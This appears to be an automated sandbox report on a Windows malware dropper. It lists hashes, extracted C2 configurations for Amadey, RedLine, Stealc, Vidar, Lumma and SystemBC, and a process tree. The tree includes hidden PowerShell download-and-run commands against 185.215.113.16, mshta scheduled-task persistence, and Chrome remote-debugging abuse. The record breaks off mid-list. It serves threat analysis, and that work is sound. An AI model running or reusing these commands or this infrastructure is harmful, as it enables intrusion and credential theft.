Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20-02-2025 14:04

General

  • Target

    3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe

  • Size

    2.1MB

  • MD5

    c69b7bac11b14128b1b1730e0f9732e9

  • SHA1

    02fb9cd3f069cf7ca9f716ef1ce42ff58ba5b230

  • SHA256

    3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1

  • SHA512

    aa945a199241a72e28f0efd9b2e471505b111aed4fb27dfe146ffec4e309d8495841ceae94e50b139f5a3c559d888d4a7229cb6c6eff780ca9ec7fdd200b7342

  • SSDEEP

    24576:gSWtfoYP2LExV94F87p/Z79SBHSA4luPmuNDjwFMh0XpR5c+JEwV2fEh+iTq7Xm4:gSWtuW7byHZ4luPjDjjh0dBSNLwqMyH

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/defend/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://185.215.113.16/mine/random.exe

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

systembc

C2

cobolrationumelawrtewarms.co:4001

93.186.202.3:4001

Attributes
  • dns

    5.132.191.104

    ns1.vic.au.dns.opennic.glue

    ns2.vic.au.dns.opennic.glue

Extracted

Family

redline

Botnet

cheat

C2

103.84.89.222:33791

Extracted

Family

stealc

Botnet

default

C2

http://ecozessentials.com

Attributes
  • url_path

    /e6cb1c8fc7cd1659.php

Extracted

Family

vidar

C2

https://t.me/g02f04

https://steamcommunity.com/profiles/76561199828130190

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0

Extracted

Family

lumma

C2

https://penetratebatt.pw/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Vidar Stealer 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 2 IoCs
  • Sectoprat family
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Systembc family
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Vidar family
  • Enumerates VirtualBox registry keys 2 TTPs 1 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 23 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

    Run Powershell and hide display window.

  • Downloads MZ/PE file 34 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Uses browser remote debugging 2 TTPs 4 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 46 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 9 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 23 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 53 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 46 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • AutoIT Executable 3 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 23 IoCs
  • Suspicious use of SetThreadContext 11 IoCs
  • UPX packed file 14 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 18 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Detects Pyinstaller 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 11 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 14 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • GoLang User-Agent 1 IoCs

    Uses default user-agent string defined by GoLang HTTP packages.

  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 38 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 37 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe
    "C:\Users\Admin\AppData\Local\Temp\3c1aad8791b6c8accf275212576ba86515780f8d7788401173915e5393980ba1.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4524
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Downloads MZ/PE file
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
        "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        PID:2908
        • C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe
          "C:\Users\Admin\AppData\Local\Temp\1087891001\f3Ypd8O.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          PID:3528
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 800
          4⤵
          • Program crash
          PID:708
      • C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe
        "C:\Users\Admin\AppData\Local\Temp\1088207001\kdMujZh.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4072
      • C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe
        "C:\Users\Admin\AppData\Local\Temp\1088752001\sQ3DZPU.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3704
        • C:\ProgramData\apisysDirectx_11\apisysDirectx.exe
          "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe"
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: AddClipboardFormatListener
          PID:684
          • C:\Windows\SysWOW64\schtasks.exe
            "schtasks.exe" /create /tn apisysDirectx_11 /tr "C:\ProgramData\apisysDirectx_11\apisysDirectx.exe" /st 14:06 /du 23:59 /sc daily /ri 1 /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:5824
      • C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe
        "C:\Users\Admin\AppData\Local\Temp\1088919001\a1EoH8b.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4772
        • C:\Windows\SysWOW64\msiexec.exe
          "C:\Windows\System32\msiexec.exe" /i "C:\Users\Admin\AppData\Local\Temp\ScreenConnect\24.3.7.9067\91b7d375130f294a\ScreenConnect.ClientSetup.msi"
          4⤵
          • Enumerates connected drives
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of FindShellTrayWindow
          PID:1224
      • C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe
        "C:\Users\Admin\AppData\Local\Temp\1089114001\MAl7pjE.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:3908
      • C:\Users\Admin\AppData\Local\Temp\1089179101\147129d910.exe
        "C:\Users\Admin\AppData\Local\Temp\1089179101\147129d910.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:2396
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c schtasks /create /tn n8BfJmabU3X /tr "mshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta" /sc minute /mo 25 /ru "Admin" /f
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2992
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn n8BfJmabU3X /tr "mshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:2040
        • C:\Windows\SysWOW64\mshta.exe
          mshta C:\Users\Admin\AppData\Local\Temp\VqNz4ZY9t.hta
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2380
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
            5⤵
            • Blocklisted process makes network request
            • Command and Scripting Interpreter: PowerShell
            • Downloads MZ/PE file
            • Suspicious behavior: EnumeratesProcesses
            PID:1060
            • C:\Users\Admin\AppData\Local\TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE
              "C:\Users\Admin\AppData\Local\TempU3DTGDSL2R7HD7J53FP0S4ERMLLEQ4NZ.EXE"
              6⤵
              • Modifies Windows Defender DisableAntiSpyware settings
              • Modifies Windows Defender Real-time Protection settings
              • Modifies Windows Defender TamperProtection settings
              • Modifies Windows Defender notification settings
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Windows security modification
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3340
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" "
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:5080
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\1089180021\am_no.cmd" any_word
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3120
          • C:\Windows\SysWOW64\timeout.exe
            timeout /t 2
            5⤵
            • Delays execution with timeout.exe
            PID:4688
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2992
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3948
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4692
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4508
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:4460
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
              6⤵
              • Command and Scripting Interpreter: PowerShell
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:4388
          • C:\Windows\SysWOW64\schtasks.exe
            schtasks /create /tn "tTdc5masekn" /tr "mshta \"C:\Temp\dozGgrJQn.hta\"" /sc minute /mo 25 /ru "Admin" /f
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:4692
          • C:\Windows\SysWOW64\mshta.exe
            mshta "C:\Temp\dozGgrJQn.hta"
            5⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            PID:4696
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:3028
              • C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
                "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
                7⤵
                • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                • Checks BIOS information in registry
                • Executes dropped EXE
                • Identifies Wine through registry keys
                • Suspicious use of NtSetInformationThreadHideFromDebugger
                • System Location Discovery: System Language Discovery
                • Suspicious behavior: EnumeratesProcesses
                PID:5376
      • C:\Users\Admin\AppData\Local\Temp\1089272001\d88b7e7413.exe
        "C:\Users\Admin\AppData\Local\Temp\1089272001\d88b7e7413.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4872
        • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
          "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
          4⤵
          • Downloads MZ/PE file
          • System Location Discovery: System Language Discovery
          PID:5800
      • C:\Users\Admin\AppData\Local\Temp\1089273001\8380fa5fb3.exe
        "C:\Users\Admin\AppData\Local\Temp\1089273001\8380fa5fb3.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        PID:4504
      • C:\Users\Admin\AppData\Local\Temp\1089274001\b95bc460f0.exe
        "C:\Users\Admin\AppData\Local\Temp\1089274001\b95bc460f0.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Checks processor information in registry
        • Suspicious behavior: EnumeratesProcesses
        PID:5208
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 5208 -s 1536
          4⤵
          • Program crash
          PID:4924
      • C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe
        "C:\Users\Admin\AppData\Local\Temp\1089275001\amnew.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in Windows directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        PID:5668
        • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
          "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
          4⤵
          • Downloads MZ/PE file
          • Checks computer location settings
          • Executes dropped EXE
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          PID:5764
          • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
            5⤵
            • Executes dropped EXE
            PID:2376
            • C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001200101\trano1221.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              PID:4640
          • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
            "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:5884
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              PID:2040
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              PID:2968
            • C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe
              "C:\Users\Admin\AppData\Local\Temp\10001960101\con12312211221.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:3792
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 5884 -s 844
              6⤵
              • Program crash
              PID:6036
          • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
            "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            PID:6104
            • C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe
              "C:\Users\Admin\AppData\Local\Temp\10002760101\monthdragon.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:5200
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 6104 -s 968
              6⤵
              • Program crash
              PID:5368
          • C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe
            "C:\Users\Admin\AppData\Local\Temp\10005030101\12321321.exe"
            5⤵
            • Executes dropped EXE
            PID:5336
          • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
            "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:1580
            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
              6⤵
              • Executes dropped EXE
              PID:4452
            • C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe
              "C:\Users\Admin\AppData\Local\Temp\10005500101\alex12112.exe"
              6⤵
              • Executes dropped EXE
              PID:2220
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1580 -s 972
              6⤵
              • Program crash
              PID:5936
          • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
            "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • System Location Discovery: System Language Discovery
            PID:3948
            • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
              "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
              6⤵
              • Executes dropped EXE
              PID:4424
            • C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe
              "C:\Users\Admin\AppData\Local\Temp\10008580101\fher.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              PID:4780
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 3948 -s 808
              6⤵
              • Program crash
              PID:5136
          • C:\Users\Admin\AppData\Local\Temp\10009640101\a8e58ac38e.exe
            "C:\Users\Admin\AppData\Local\Temp\10009640101\a8e58ac38e.exe"
            5⤵
            • Enumerates VirtualBox registry keys
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            PID:4636
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 4636 -s 1136
              6⤵
              • Program crash
              PID:4480
          • C:\Users\Admin\AppData\Local\Temp\10009650101\cda781c13c.exe
            "C:\Users\Admin\AppData\Local\Temp\10009650101\cda781c13c.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious use of SetThreadContext
            PID:5476
            • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
              6⤵
              • Downloads MZ/PE file
              • System Location Discovery: System Language Discovery
              PID:4000
      • C:\Users\Admin\AppData\Local\Temp\1089276001\e14cb127ab.exe
        "C:\Users\Admin\AppData\Local\Temp\1089276001\e14cb127ab.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:3460
      • C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe
        "C:\Users\Admin\AppData\Local\Temp\1089278001\DTQCxXZ.exe"
        3⤵
        • Executes dropped EXE
        PID:4572
      • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
        "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        PID:5728
        • C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe
          "C:\Users\Admin\AppData\Local\Temp\1089279001\7aencsM.exe"
          4⤵
          • Executes dropped EXE
          • Checks processor information in registry
          PID:5864
          • C:\Program Files\Google\Chrome\Application\chrome.exe
            "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
            5⤵
            • Uses browser remote debugging
            • Drops file in Windows directory
            • Enumerates system info in registry
            • Modifies data under HKEY_USERS
            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
            • Suspicious use of FindShellTrayWindow
            PID:2372
            • C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd81b9cc40,0x7ffd81b9cc4c,0x7ffd81b9cc58
              6⤵
                PID:4856
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1976,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=1972 /prefetch:2
                6⤵
                  PID:3628
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1904,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2096 /prefetch:3
                  6⤵
                    PID:5372
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2276,i,13322858442827868434,17062769863297718268,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=2292 /prefetch:8
                    6⤵
                      PID:5416
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
